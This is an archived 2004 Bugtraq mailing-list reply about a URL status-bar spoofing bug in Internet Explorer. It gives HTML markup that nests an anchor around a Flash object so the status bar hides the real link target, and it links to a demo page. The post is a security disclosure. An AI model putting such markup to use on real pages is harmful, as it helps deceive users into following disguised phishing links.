lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20041108233055.25153.qmail@www.securityfocus.com> Date: 8 Nov 2004 23:30:55 -0000 From: roozbeh afrasiabi <roozbeh_afrasiabi@...oo.com> To: bugtraq@...urityfocus.com Subject: Re: New URL spoofing bug in Microsoft Internet Explorer In-Reply-To: <005401c4bd36$6fdf3800$d9ebb9d9@...computer> Here is another way of spoofing the status bar: <a> tag + <object> tag <!--A HREF=http://www.yahoo.com><!--OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="300" HEIGHT="50" id="link" ALIGN=""> <PARAM NAME=movie VALUE="link.swf"> <PARAM NAME=quality VALUE=high > <PARAM NAME=bgcolor VALUE=#FFFFFF> <PARAM NAME=menu VALU=FALSE> <EMBED src="link.swf" quality=high bgcolor=#FFFFFF WIDTH="300" HEIGHT="50" NAME="link" ALIGN="" TYPE="application/x-shockwave-flash" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED> </a></OBJECT></a> *this method of spoofing the status bar allows malicious users to hide the target url from suspecting ppl ,demo page uses flash to generate random urls. demo: http://www.persiax.com/pocs/statusbar/status.htm
Powered by blists - more mailing lists